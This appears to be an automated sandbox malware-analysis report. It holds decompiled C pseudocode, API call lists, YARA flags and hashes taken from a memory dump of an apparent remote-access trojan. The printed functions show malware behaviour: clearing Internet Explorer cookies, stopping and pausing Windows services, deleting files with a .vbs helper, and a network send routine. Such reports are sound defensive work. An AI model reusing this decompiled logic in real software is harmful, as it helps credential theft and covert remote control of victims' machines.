                                    				Sleep(0x1f4);
                                    				_t394 = _t394 + 1;
                                    				if(_t394 < 0xa) {
                                    					goto L5;
                                    				}
                                    				goto L15;
                                    			}

                                    0x00410305
                                    0x00410320
                                    0x00410323
                                    0x0041032f
                                    0x00410332
                                    0x00410335
                                    0x00410340
                                    0x0041034b
                                    0x00410368
                                    0x00410371
                                    0x0041038e
                                    0x00410397
                                    0x004103b4
                                    0x004103bd
                                    0x004103c5
                                    0x004103dd
                                    0x00410428
                                    0x00410430
                                    0x0041043b
                                    0x00410446
                                    0x00410451
                                    0x00410459
                                    0x004104ba
                                    0x004104bc
                                    0x004104c7
                                    0x004104d2
                                    0x004104da
                                    0x004104e2
                                    0x0041053a
                                    0x0041053d
                                    0x00410545
                                    0x0041054d
                                    0x00410558
                                    0x00410566
                                    0x0041056b
                                    0x0041056d
                                    0x0041056d
                                    0x00410571
                                    0x00410573
                                    0x00410573
                                    0x00410574
                                    0x0041057a
                                    0x00000000
                                    0x0041057c
                                    0x00410596
                                    0x0041059e
                                    0x004105a8
                                    0x004105a8
                                    0x004105c4
                                    0x004105cc
                                    0x004105d6
                                    0x004105d6
                                    0x004105f2
                                    0x004105fa
                                    0x00410604
                                    0x00410604
                                    0x0041060a
                                    0x00000000
                                    0x00000000
                                    0x0041062d
                                    0x00410635
                                    0x0041063a
                                    0x0041063c
                                    0x0041078d
                                    0x00410793
                                    0x0041079a
                                    0x004107a5
                                    0x004107ad
                                    0x004107b5
                                    0x004107bd
                                    0x00410642
                                    0x0041064a
                                    0x004106ce
                                    0x004106d4
                                    0x004106db
                                    0x004106e6
                                    0x004106ee
                                    0x004106f6
                                    0x004106fe
                                    0x00410706
                                    0x00410711
                                    0x0041071c
                                    0x00410721
                                    0x004107c5
                                    0x004107d0
                                    0x004107db
                                    0x004107e6
                                    0x004107f1
                                    0x004107fc
                                    0x00410807
                                    0x0041080f
                                    0x00410817
                                    0x0041081f
                                    0x00410827
                                    0x0041083a
                                    0x00410618
                                    0x0041061d
                                    0x00410623
                                    0x00410627
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410323
                                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,76D7FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105A8
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 004105D6
                                    • DeleteFileW.KERNEL32(00000000,0045F464,0045F464,0045F464), ref: 00410604
                                    • Sleep.KERNEL32(000001F4,0045F464,0045F464,0045F464), ref: 0041061D
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                    • String ID: /stext "
                                    • API String ID: 1351907930-3856184850
                                    • Opcode ID: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                                    • Instruction ID: c6d11188fe555bf6b2f514a85e60615a11b65789dd85123b9d7458d5680bae53
                                    • Opcode Fuzzy Hash: 7f364b6bc4c442b28ae900f15efb8b9cafff702cbe6493c4fbee87e885f413c0
                                    • Instruction Fuzzy Hash: DDD15C319102595BCB19FB61DC91AEDB375AF54308F4041BFA40AB71E2EF785E89CE48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E0040A409(void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v340;
                                    				void* __ebx;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t17;
                                    				void* _t20;
                                    				int _t34;
                                    				void* _t40;
                                    				void* _t41;
                                    				char* _t42;
                                    				void* _t48;
                                    				char* _t55;
                                    				void* _t59;
                                    				void* _t61;
                                    				void* _t62;
                                    
                                    				_t42 =  &_v28;
                                    				E004020D5(_t40, _t42);
                                    				_push(_t42);
                                    				_t41 = 0;
                                    				_t17 = E004108E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                                    				_t62 = _t61 + 0xc;
                                    				L00401FD1( &_v28, 0x80000001, _t59, _t17);
                                    				L00401FC7();
                                    				_t58 = 0x45f6bc;
                                    				_t20 = L00405A6F(0x45f6bc);
                                    				_t66 = _t20;
                                    				if(_t20 == 0) {
                                    					ExpandEnvironmentStringsA(L00401F95( &_v28),  &_v340, 0x104);
                                    					__eflags = PathFileExistsA( &_v340);
                                    					if(__eflags == 0) {
                                    						goto L1;
                                    					} else {
                                    						E00402084(0,  &_v52,  &_v340);
                                    						_t58 =  &_v52;
                                    						_t34 = L00417754(L00401EEB(E004172DA( &_v76,  &_v52)));
                                    						L00401EF0();
                                    						_t55 =  &_v52;
                                    						L00401FC7();
                                    						__eflags = _t34;
                                    						if(__eflags == 0) {
                                    							_push(_t55);
                                    							_push(_t55);
                                    							__eflags = L0040A713();
                                    							if(__eflags != 0) {
                                    								_t41 = 1;
                                    								E00402084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
                                    								L0040A6EF(1,  &_v52, __eflags);
                                    								goto L8;
                                    							}
                                    						} else {
                                    							_t48 = _t62 - 0x18;
                                    							_push("\n[IE cookies cleared!]");
                                    							goto L2;
                                    						}
                                    					}
                                    				} else {
                                    					L1:
                                    					_t48 = _t62 - 0x18;
                                    					_push("\n[IE cookies not found]");
                                    					L2:
                                    					E00402084(_t41, _t48);
                                    					L0040A6EF(_t41, _t58, _t66);
                                    					_t41 = 1;
                                    					L8:
                                    				}
                                    				L00401FC7();
                                    				return _t41;
                                    			}

                                    APIs
                                      • Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                                      • Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                                      • Part of subcall function 004108E2: RegCloseKey.ADVAPI32(?), ref: 0041092C
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040A498
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                                    • Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
                                    • Opcode Fuzzy Hash: 518f696caf34a80e50aed5e85b550f5397911344afae7d95c44acabde01ece65
                                    • Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E004501D3(char* _a4, short* _a8) {
                                    				int _v8;
                                    				void* __ecx;
                                    				void* __esi;
                                    				short* _t10;
                                    				short* _t14;
                                    				int _t15;
                                    				short* _t16;
                                    				void* _t26;
                                    				int _t27;
                                    				void* _t29;
                                    				short* _t35;
                                    				short* _t39;
                                    				short* _t40;
                                    
                                    				_push(_t29);
                                    				if(_a4 != 0) {
                                    					_t39 = _a8;
                                    					__eflags = _t39;
                                    					if(__eflags != 0) {
                                    						_push(_t26);
                                    						E004420AE(_t29, _t39, __eflags);
                                    						asm("sbb ebx, ebx");
                                    						_t35 = 0;
                                    						_t27 = _t26 + 1;
                                    						 *_t39 = 0;
                                    						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                    						_v8 = _t10;
                                    						__eflags = _t10;
                                    						if(_t10 != 0) {
                                    							_t40 = E0043F98C(_t29, _t10 + _t10);
                                    							__eflags = _t40;
                                    							if(_t40 != 0) {
                                    								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                                    								__eflags = _t15;
                                    								if(_t15 != 0) {
                                    									_t16 = _t40;
                                    									_t40 = 0;
                                    									_t35 = 1;
                                    									__eflags = 1;
                                    									 *_a8 = _t16;
                                    								} else {
                                    									E0043A4CE(GetLastError());
                                    								}
                                    							}
                                    							E004401F5(_t40);
                                    							_t14 = _t35;
                                    						} else {
                                    							E0043A4CE(GetLastError());
                                    							_t14 = 0;
                                    						}
                                    					} else {
                                    						 *((intOrPtr*)(L0043A504())) = 0x16;
                                    						L0043695D();
                                    						_t14 = 0;
                                    					}
                                    					return _t14;
                                    				}
                                    				 *((intOrPtr*)(L0043A504())) = 0x16;
                                    				L0043695D();
                                    				return 0;
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                                    • Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
                                    • Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
                                    • Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0044917A(intOrPtr _a4) {
                                    				void* _t18;
                                    				intOrPtr _t45;
                                    
                                    				_t45 = _a4;
                                    				if(_t45 != 0) {
                                    					L00448EC1(_t45, 7);
                                    					_t2 = _t45 + 0x1c; // 0x1c
                                    					L00448EC1(_t2, 7);
                                    					_t3 = _t45 + 0x38; // 0x38
                                    					L00448EC1(_t3, 0xc);
                                    					_t4 = _t45 + 0x68; // 0x68
                                    					L00448EC1(_t4, 0xc);
                                    					_t5 = _t45 + 0x98; // 0x98
                                    					L00448EC1(_t5, 2);
                                    					E004401F5( *((intOrPtr*)(_t45 + 0xa0)));
                                    					E004401F5( *((intOrPtr*)(_t45 + 0xa4)));
                                    					E004401F5( *((intOrPtr*)(_t45 + 0xa8)));
                                    					_t9 = _t45 + 0xb4; // 0xb4
                                    					L00448EC1(_t9, 7);
                                    					_t10 = _t45 + 0xd0; // 0xd0
                                    					L00448EC1(_t10, 7);
                                    					_t11 = _t45 + 0xec; // 0xec
                                    					L00448EC1(_t11, 0xc);
                                    					_t12 = _t45 + 0x11c; // 0x11c
                                    					L00448EC1(_t12, 0xc);
                                    					_t13 = _t45 + 0x14c; // 0x14c
                                    					L00448EC1(_t13, 2);
                                    					E004401F5( *((intOrPtr*)(_t45 + 0x154)));
                                    					E004401F5( *((intOrPtr*)(_t45 + 0x158)));
                                    					E004401F5( *((intOrPtr*)(_t45 + 0x15c)));
                                    					return E004401F5( *((intOrPtr*)(_t45 + 0x160)));
                                    				}
                                    				return _t18;
                                    			}

                                    APIs
                                      • Part of subcall function 00448EC1: _free.LIBCMT ref: 00448EEA
                                    • _free.LIBCMT ref: 004491C8
                                      • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                    • _free.LIBCMT ref: 004491D3
                                    • _free.LIBCMT ref: 004491DE
                                    • _free.LIBCMT ref: 00449232
                                    • _free.LIBCMT ref: 0044923D
                                    • _free.LIBCMT ref: 00449248
                                    • _free.LIBCMT ref: 00449253
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction ID: d0ac5bec4300d42e5daa1f0178d5914e2472619a840d7a0986f756f09d30ade7
                                    • Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
                                    • Instruction Fuzzy Hash: A7115172940B04BAFA20BBB2CC47FCF779CAF00705F50081EB39AA6052DE7EB5244658
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E004350B5(void* __ecx) {
                                    				void* _t4;
                                    				void* _t11;
                                    				void* _t16;
                                    				long _t25;
                                    				void* _t28;
                                    
                                    				if( *0x46a090 != 0xffffffff) {
                                    					_t25 = GetLastError();
                                    					_t11 = L00431BD8(__eflags,  *0x46a090);
                                    					__eflags = _t11 - 0xffffffff;
                                    					if(_t11 == 0xffffffff) {
                                    						L5:
                                    						_t11 = 0;
                                    					} else {
                                    						__eflags = _t11;
                                    						if(__eflags == 0) {
                                    							_t4 = L00431C12(__eflags,  *0x46a090, 0xffffffff);
                                    							_pop(_t16);
                                    							__eflags = _t4;
                                    							if(_t4 != 0) {
                                    								_t28 = E0043F348(_t16, 1, 0x28);
                                    								__eflags = _t28;
                                    								if(__eflags == 0) {
                                    									L8:
                                    									_t11 = 0;
                                    									L00431C12(__eflags,  *0x46a090, 0);
                                    								} else {
                                    									__eflags = L00431C12(__eflags,  *0x46a090, _t28);
                                    									if(__eflags != 0) {
                                    										_t11 = _t28;
                                    										_t28 = 0;
                                    										__eflags = 0;
                                    									} else {
                                    										goto L8;
                                    									}
                                    								}
                                    								E004401F5(_t28);
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    					}
                                    					SetLastError(_t25);
                                    					return _t11;
                                    				} else {
                                    					return 0;
                                    				}
                                    			}

                                    APIs
                                    • GetLastError.KERNEL32(?,?,004350AC,004321F2), ref: 004350C3
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004350D1
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004350EA
                                    • SetLastError.KERNEL32(00000000,?,004350AC,004321F2), ref: 0043513C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                                    • Instruction ID: a515c6194843fa53ce6413da374b9e5764b9e55810f12d35b037beed10178e82
                                    • Opcode Fuzzy Hash: 3f66e197c8296636e8c0cb4b5eca29cb01eb5dab6965f0ce3b8c02db1c8883f5
                                    • Instruction Fuzzy Hash: EC01F532549B115EEA152E79AC4562B2654DB0D779F20223FF220511F1FE594C11564E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0040511B(void* __ecx, void* __edi, char _a4) {
                                    				void* _t17;
                                    				void* _t22;
                                    				void* _t23;
                                    
                                    				_t22 = __ecx;
                                    				if( *((char*)(__ecx + 0x50)) == 0) {
                                    					return 0;
                                    				}
                                    				if(_a4 == 0) {
                                    					_t24 = _t23 - 0x18;
                                    					E00402084(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
                                    					E00402084(_t17, _t24 - 0x18, "[WARNING]");
                                    					L00416C80(_t17, __edi);
                                    				}
                                    				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
                                    				SetEvent( *(_t22 + 0x54));
                                    				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
                                    				CloseHandle( *(_t22 + 0x58));
                                    				return 1;
                                    			}

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405159
                                    • SetEvent.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405165
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405170
                                    • CloseHandle.KERNEL32(?,?,00404CA9,00000001,0046C138,00404C56,00000000,00000000,00000000), ref: 00405179
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: Connection KeepAlive disabled$[WARNING]
                                    • API String ID: 2993684571-804309475
                                    • Opcode ID: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                                    • Instruction ID: 60a08de37f047c10c4ebd60d286cc91250b6658f2aab9bb1a866a2a778ec74b8
                                    • Opcode Fuzzy Hash: 76a279513c8000d45bb1d856bce9f14881a2df12ec43bda3983b3d9b034b403d
                                    • Instruction Fuzzy Hash: E0F0C272900B407FDB103BB59C0EA7B7B98DB0135AF04057AFD41926E2DAB9D8548B9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E0043F14E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				char* _v44;
                                    				char _v48;
                                    				void* __ecx;
                                    				signed int _t67;
                                    				signed int _t70;
                                    				signed int _t74;
                                    				intOrPtr _t75;
                                    				signed int _t78;
                                    				intOrPtr _t86;
                                    				signed int _t97;
                                    				void* _t99;
                                    				void* _t101;
                                    				void* _t106;
                                    				signed int _t110;
                                    				signed int _t111;
                                    				signed int _t114;
                                    				signed int _t121;
                                    				signed int _t123;
                                    				intOrPtr _t124;
                                    				signed int _t126;
                                    				intOrPtr _t128;
                                    				signed int _t129;
                                    				void* _t133;
                                    				void* _t134;
                                    				void* _t136;
                                    
                                    				_t118 = __edx;
                                    				_t95 = __ebx;
                                    				_push(_t99);
                                    				if(_a8 != 0) {
                                    					_push(__esi);
                                    					_push(__edi);
                                    					_t121 = 0;
                                    					_t67 = L0043AE14( &_v8, 0, 0, _a8, 0x7fffffff);
                                    					_t134 = _t133 + 0x14;
                                    					__eflags = _t67;
                                    					if(_t67 == 0) {
                                    						L5:
                                    						_t126 = E0043F348(_t99, _v8, 2);
                                    						_pop(_t101);
                                    						__eflags = _t126;
                                    						if(_t126 == 0) {
                                    							L11:
                                    							E004401F5(_t126);
                                    							_t70 = _t121;
                                    							goto L12;
                                    						} else {
                                    							_t67 = L0043AE14(_t121, _t126, _v8, _a8, 0xffffffff);
                                    							_t134 = _t134 + 0x14;
                                    							__eflags = _t67;
                                    							if(_t67 == 0) {
                                    								_t121 = E0043E4D0(_t95, _t101, _t118, _a4, _t126);
                                    								goto L11;
                                    							} else {
                                    								__eflags = _t67 - 0x16;
                                    								if(_t67 == 0x16) {
                                    									goto L13;
                                    								} else {
                                    									__eflags = _t67 - 0x22;
                                    									if(_t67 != 0x22) {
                                    										goto L11;
                                    									} else {
                                    										goto L13;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						__eflags = _t67 - 0x16;
                                    						if(_t67 == 0x16) {
                                    							L13:
                                    							_push(_t121);
                                    							_push(_t121);
                                    							_push(_t121);
                                    							_push(_t121);
                                    							L0043698A(_t67);
                                    							asm("int3");
                                    							L0042FB60(0x468270, 0x1c);
                                    							_t128 = _a4;
                                    							_t74 = E0043F14E(_t95, _t118, _t121, _t128, _t128, _a8);
                                    							_t106 = _t121;
                                    							_t123 = _t74;
                                    							__eflags = _t123;
                                    							if(_t123 != 0) {
                                    								_t75 = L00441CE2(_t95, _t106, _t118);
                                    								_v40 = _t75;
                                    								_v48 =  *((intOrPtr*)(_t75 + 0x4c));
                                    								_t108 =  *((intOrPtr*)(_t75 + 0x48));
                                    								_v44 =  *((intOrPtr*)(_t75 + 0x48));
                                    								_v32 = 0;
                                    								_t78 = L0043B53B( *((intOrPtr*)(_t75 + 0x48)),  &_v32, 0, 0, _t123, 0,  &_v48);
                                    								_t136 = _t134 + 0x18;
                                    								__eflags = _t78;
                                    								if(_t78 == 0) {
                                    									L22:
                                    									_t97 = E0043F98C(_t108, _v32 + 4);
                                    									__eflags = _t97;
                                    									if(_t97 == 0) {
                                    										goto L15;
                                    									} else {
                                    										_t20 = _t97 + 4; // 0x4
                                    										_v36 = _t20;
                                    										_t108 =  &_v48;
                                    										_t123 = 0;
                                    										_t78 = L0043B53B( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                                    										_t136 = _t136 + 0x18;
                                    										__eflags = _t78;
                                    										if(_t78 == 0) {
                                    											L29:
                                    											_t124 = _v48;
                                    											E0043F0DD(4);
                                    											_pop(_t110);
                                    											_v8 = _v8 & 0x00000000;
                                    											_t129 = _t128 + _t128;
                                    											_t111 = _t110 | 0xffffffff;
                                    											__eflags =  *(_t124 + 0x24 + _t129 * 8);
                                    											if(__eflags != 0) {
                                    												asm("lock xadd [edx], eax");
                                    												if(__eflags == 0) {
                                    													E004401F5( *(_t124 + 0x24 + _t129 * 8));
                                    													_pop(_t114);
                                    													 *(_t124 + 0x24 + _t129 * 8) =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
                                    													_t111 = _t114 | 0xffffffff;
                                    													__eflags = _t111;
                                    												}
                                    											}
                                    											_t86 = _v40;
                                    											__eflags =  *(_t86 + 0x350) & 0x00000002;
                                    											if(( *(_t86 + 0x350) & 0x00000002) == 0) {
                                    												__eflags =  *0x46a9a4 & 0x00000001;
                                    												if(( *0x46a9a4 & 0x00000001) == 0) {
                                    													__eflags =  *(_t124 + 0x24 + _t129 * 8);
                                    													if( *(_t124 + 0x24 + _t129 * 8) != 0) {
                                    														asm("lock xadd [eax], ecx");
                                    														__eflags = _t111 == 1;
                                    														if(_t111 == 1) {
                                    															E004401F5( *(_t124 + 0x24 + _t129 * 8));
                                    															_t51 = _t124 + 0x24 + _t129 * 8;
                                    															 *_t51 =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
                                    															__eflags =  *_t51;
                                    														}
                                    													}
                                    												}
                                    											}
                                    											 *_t97 =  *((intOrPtr*)(_t124 + 0xc));
                                    											 *(_t124 + 0x24 + _t129 * 8) = _t97;
                                    											 *((intOrPtr*)(_t124 + 0x1c + _t129 * 8)) = _v36;
                                    											_v8 = 0xfffffffe;
                                    											E0043F33F();
                                    										} else {
                                    											__eflags = _t78 - 0x16;
                                    											if(_t78 == 0x16) {
                                    												L26:
                                    												_push(_t123);
                                    												_push(_t123);
                                    												_push(_t123);
                                    												_push(_t123);
                                    												_push(_t123);
                                    												goto L20;
                                    											} else {
                                    												__eflags = _t78 - 0x22;
                                    												if(_t78 != 0x22) {
                                    													__eflags = _t78;
                                    													if(_t78 == 0) {
                                    														goto L29;
                                    													} else {
                                    														E004401F5(_t97);
                                    														goto L15;
                                    													}
                                    												} else {
                                    													goto L26;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								} else {
                                    									__eflags = _t78 - 0x16;
                                    									if(_t78 == 0x16) {
                                    										L19:
                                    										_push(0);
                                    										_push(0);
                                    										_push(0);
                                    										_push(0);
                                    										_push(0);
                                    										L20:
                                    										_t78 = L0043698A(_t78);
                                    									} else {
                                    										__eflags = _t78 - 0x22;
                                    										if(_t78 == 0x22) {
                                    											goto L19;
                                    										}
                                    									}
                                    									__eflags = _t78;
                                    									if(_t78 != 0) {
                                    										goto L15;
                                    									} else {
                                    										goto L22;
                                    									}
                                    								}
                                    							} else {
                                    								L15:
                                    							}
                                    							return L0042FBA6();
                                    						} else {
                                    							__eflags = _t67 - 0x22;
                                    							if(_t67 == 0x22) {
                                    								goto L13;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					_t70 = E0043E4D0(__ebx, _t99, __edx, _a4, 0);
                                    					L12:
                                    					return _t70;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                                    • Instruction ID: bcbe42ceaebb365c1ac6e2a5e9ed457d7b54482c9f0ea6a0937b1c10150bb98b
                                    • Opcode Fuzzy Hash: c2a31f394107e0f3225fa1d7b5013d3964004684340a0b5a6b4c6d0f9cd202bf
                                    • Instruction Fuzzy Hash: E451E432D00205EADF249B69DC41BAF77A8AF4D324F60527FF91592282DB3DDD048A6C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0041640B(char _a4) {
                                    				struct _SERVICE_STATUS _v32;
                                    				signed int _t16;
                                    				void* _t19;
                                    				void* _t20;
                                    
                                    				_t16 = 0;
                                    				_t20 = OpenSCManagerW(0, 0, 0x20);
                                    				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x20);
                                    				if(_t19 != 0) {
                                    					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                                    					CloseServiceHandle(_t20);
                                    					CloseServiceHandle(_t19);
                                    				} else {
                                    					CloseServiceHandle(_t20);
                                    				}
                                    				L00401EF0();
                                    				return _t16;
                                    			}

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                    • Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
                                    • Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
                                    • Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00416576(char _a4) {
                                    				struct _SERVICE_STATUS _v32;
                                    				signed int _t16;
                                    				void* _t19;
                                    				void* _t20;
                                    
                                    				_t16 = 0;
                                    				_t20 = OpenSCManagerW(0, 0, 0x40);
                                    				_t19 = OpenServiceW(_t20, L00401EEB( &_a4), 0x40);
                                    				if(_t19 != 0) {
                                    					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                                    					CloseServiceHandle(_t20);
                                    					CloseServiceHandle(_t19);
                                    				} else {
                                    					CloseServiceHandle(_t20);
                                    				}
                                    				L00401EF0();
                                    				return _t16;
                                    			}

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
